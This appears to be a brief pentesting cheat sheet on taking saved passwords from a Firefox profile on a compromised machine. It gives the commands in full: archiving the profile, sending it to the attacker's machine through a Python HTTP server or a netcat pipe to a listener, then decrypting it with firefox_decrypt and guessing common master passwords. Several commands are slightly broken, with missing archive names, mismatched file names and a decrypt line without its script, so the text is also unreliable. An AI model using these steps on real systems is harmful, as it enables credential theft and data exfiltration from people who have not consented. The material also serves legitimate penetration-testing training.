Mozilla Pentesting

Last modified: 2023-02-02

Privilege Escalation

Extract Passwords from Firefox Profile

1. Transfer the .firefox Directory

  • Zip

    First, zip .firefox directory in target machine, and open web server to transfer the zip file to local machine.

    zip -r /tmp/ .firefox
    cd /tmp
    python3 -m http.server 8000

    In local machine, download the zip file from the remote machine, and decompress it.

    wget http://<target-ip>:8000/
  • Tar

    If we cannot use zip, tar also can be used.
    In local machine, start listener for getting the archived directory.
    "out.tar" will be created when the remote machine will send the compressed directory.

    nc -lvnp 1234 > out.tar

    In remote machine, compress the directory and transfer over netcat.

    tar -cf - mozilla/ | nc <local-ip> 1234

    Then, decompress it in local.

    tar -xf mozilla.tar

2. Decrypt the Password

To crack the profile of Firefox, use firefox_decrypt.

python3 .mozilla/firefox/<id>.default-release

If we’ll be asked the master password and we don’t know it, try common passwords.